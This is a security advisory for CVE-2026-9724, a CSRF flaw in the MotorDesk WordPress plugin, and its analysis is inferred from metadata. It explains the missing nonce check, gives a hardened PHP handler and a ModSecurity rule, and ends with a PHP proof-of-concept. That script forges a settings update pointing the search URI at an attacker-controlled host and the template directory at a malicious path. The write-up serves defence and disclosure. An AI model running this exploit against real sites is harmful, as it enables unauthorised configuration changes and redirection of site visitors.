Atomic Edge analysis of CVE-2026-9724 (metadata-based):
This vulnerability is a Cross-Site Request Forgery (CSRF) in the MotorDesk plugin for WordPress, affecting all versions up to and including 1.1.2. An unauthenticated attacker can trick a site administrator into performing an action that modifies the plugin’s configuration settings, specifically the search page URI and custom template directory path. The CVSS score of 4.3 reflects the low impact on integrity with no direct data exposure or privilege escalation.
Root Cause:
Based on the CWE and description, the root cause is the absence of nonce validation in the `motordesk_admin_home` function. In WordPress admin handlers, a nonce is a security token that ensures a request originated from a form the site issued to the intended user's session. Without it, a crafted request can be submitted to any endpoint that calls this function. Atomic Edge analysis infers this conclusion from the metadata, as no code diff is available to confirm the exact location. The function likely processes settings updates via a POST request and lacks a check like `wp_verify_nonce( $_REQUEST['_wpnonce'], 'motordesk_settings' )`.
Exploitation:
An attacker can exploit this vulnerability by crafting a malicious HTML page that submits a POST request to the WordPress admin URL where the `motordesk_admin_home` function is hooked. The typical endpoint is a WordPress admin menu page. The attack requires social engineering: the attacker must trick a logged-in administrator into viewing the malicious page and performing an action (e.g., clicking a link or loading a page with an auto-submitted form). The request includes parameters for the search page URI and custom template directory path. If successful, the attacker can change these settings to arbitrary values, such as redirecting searches to a malicious site or loading templates from an attacker-controlled server.
Remediation:
The fix must add nonce validation to the `motordesk_admin_home` function. Atomic Edge research recommends using `check_admin_referer( 'motordesk_settings' )` or `wp_verify_nonce()` at the start of the function. The nonce should be included in the form as a hidden field using `wp_nonce_field( 'motordesk_settings' )`. A nonce proves that the request came from a form the site issued to that user, not that the user is allowed to change settings, so the handler should also keep a `current_user_can()` capability check. Additionally, input sanitization should be applied to the settings values before saving them to the database, and output escaping when they are rendered back into the admin page.
Impact:
If exploited, an attacker can modify the plugin's configuration settings. This could lead to defacement, redirection of search results to external malicious sites, or inclusion of arbitrary template files if the custom template directory path is used without further validation. In the worst case, if the plugin loads templates from the custom path, an attacker could achieve remote code execution by pointing it to a directory containing malicious PHP files. However, the CVSS vector scores the integrity impact as low and the availability impact as none, so the expected effect is a limited configuration change, such as an altered search page URI.
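As an added illustration (not the MotorDesk plugin's own code; the hook name, option names, form field names and the 'motordesk_settings' nonce action are assumptions), a hardened admin-post handler that applies the nonce and capability checks from the Remediation section together with the same-site URI check and the template-directory containment check that the Impact section calls for:

```php
<?php
// Added illustrative hardening, not the MotorDesk plugin's own code. The hook name,
// option names, form field names and the 'motordesk_settings' nonce action are assumed.

// Settings form: the nonce field travels with the inputs and is checked on save.
function motordesk_settings_form_example() {
    $form_action = esc_url( admin_url( 'admin-post.php' ) );
    echo '<form method="post" action="' . $form_action . '">';
    wp_nonce_field( 'motordesk_settings', '_wpnonce' );
    echo '<input type="hidden" name="action" value="motordesk_save_settings">';
    echo '<input type="text" name="search_page_uri" value="'
        . esc_attr( get_option( 'motordesk_search_page_uri', '' ) ) . '">';
    echo '<input type="text" name="custom_template_dir" value="'
        . esc_attr( get_option( 'motordesk_custom_template_dir', '' ) ) . '">';
    submit_button( 'Save' );
    echo '</form>';
}

// Handler for admin-post.php?action=motordesk_save_settings.
function motordesk_save_settings_example() {
    // Authorisation first: a nonce proves intent, not permission.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', 403 );
    }
    // Rejects (HTTP 403) a request whose _wpnonce is missing, expired or issued to another user.
    check_admin_referer( 'motordesk_settings', '_wpnonce' );

    // Search page URI: allow relative paths or same-host URLs only, so the setting cannot redirect off-site.
    $uri  = esc_url_raw( wp_unslash( $_POST['search_page_uri'] ?? '' ) );
    $host = wp_parse_url( $uri, PHP_URL_HOST );
    if ( null !== $host && $host !== wp_parse_url( home_url(), PHP_URL_HOST ) ) {
        wp_die( 'Search page URI must point to this site', 400 );
    }

    // Template directory: resolve it and require it to stay inside the active theme.
    $dir  = sanitize_text_field( wp_unslash( $_POST['custom_template_dir'] ?? '' ) );
    $base = realpath( get_stylesheet_directory() );
    $real = ( '' === $dir ) ? $base : realpath( trailingslashit( $base ) . $dir );
    if ( false === $real || ( $real !== $base && 0 !== strpos( $real, $base . DIRECTORY_SEPARATOR ) ) ) {
        wp_die( 'Template directory must be inside the active theme', 400 );
    }

    update_option( 'motordesk_search_page_uri', $uri );
    update_option( 'motordesk_custom_template_dir', $real );
    wp_safe_redirect( admin_url( 'admin.php?page=motordesk' ) );
    exit;
}
add_action( 'admin_post_motordesk_save_settings', 'motordesk_save_settings_example' );
```

The forged request from the Exploitation section carries no `_wpnonce`, so `check_admin_referer()` stops it before any option is written; the two validation blocks additionally bound what a legitimate admin can set.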
Here you will find our ModSecurity-compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-9724 (metadata-based)
# Block CSRF exploitation of MotorDesk settings update via admin-post handler
# This rule blocks requests to the motordesk_save_settings action that carry no _wpnonce
# parameter at all (a forged cross-site form cannot know the victim's nonce). It uses
# REQUEST_FILENAME rather than REQUEST_URI so a query string does not defeat @streq, and
# ARGS rather than ARGS_POST because WordPress reads both action and nonce from $_REQUEST.
# The count operator (&) is required: a plain @rx on ARGS:_wpnonce never fires when the
# parameter is absent. The WAF cannot verify the nonce value; that check stays in the plugin.
SecRule REQUEST_FILENAME "@streq /wp-admin/admin-post.php" \
    "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-9724 CSRF attempt to MotorDesk settings update',severity:'CRITICAL',tag:'CVE-2026-9724',tag:'wordpress',tag:'motordesk'"
    SecRule ARGS:action "@streq motordesk_save_settings" "chain"
        SecRule &ARGS:_wpnonce "@eq 0"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-9724 - MotorDesk <= 1.1.2 - Cross-Site Request Forgery to Settings Update
/**
* This PHP script demonstrates a CSRF attack against the MotorDesk plugin.
* It sends a forged POST request to change plugin settings.
* The target admin URL where motordesk_admin_home processes settings is inferred
* as /wp-admin/admin-post.php?action=motordesk_save_settings or the plugin's menu page
* under /wp-admin/admin.php?page=motordesk. This PoC uses the admin-post handler pattern.
* Assumption: The plugin registers an admin action hook for settings update.
*/
// Configuration
$target_url = 'http://example.com/wp-admin/admin-post.php'; // Change to target WordPress admin
$action_param = 'motordesk_save_settings'; // Inferred admin action
// Plugin settings parameters (based on description: search_page_uri, custom_template_directory)
$payload = array(
'action' => $action_param,
'search_page_uri' => 'http://attacker-controlled.com/malicious-redirect',
'custom_template_dir' => '/var/www/html/wp-content/uploads/malicious_templates/',
'_wp_http_referer' => '/wp-admin/admin.php?page=motordesk', // Spoof referer
// No nonce parameter included, as the vulnerability exploits missing validation
);
// Initiate cURL request
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
// Opt into cookies to simulate admin session (victim must be logged-in)
// In a real attack, the attacker does not supply cookies; the victim's browser does.
// This script is for testing purposes: you must already have an admin session cookie.
// For actual exploitation, create an HTML form with auto-submit JavaScript.
curl_setopt($ch, CURLOPT_COOKIE, 'wordpress_logged_in_xxx=VICTIM_COOKIE; PHPSESSID=xxx');
// Optional: spoof referer header
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Referer: ' . $target_url));
$response = curl_exec($ch);
if (curl_error($ch)) {
echo 'cURL error: ' . curl_error($ch) . "\n";
}
curl_close($ch);
echo "CSRF attack payload sent to $target_url\n";
echo "Check if settings were updated by visiting plugin configuration page.\n";
?>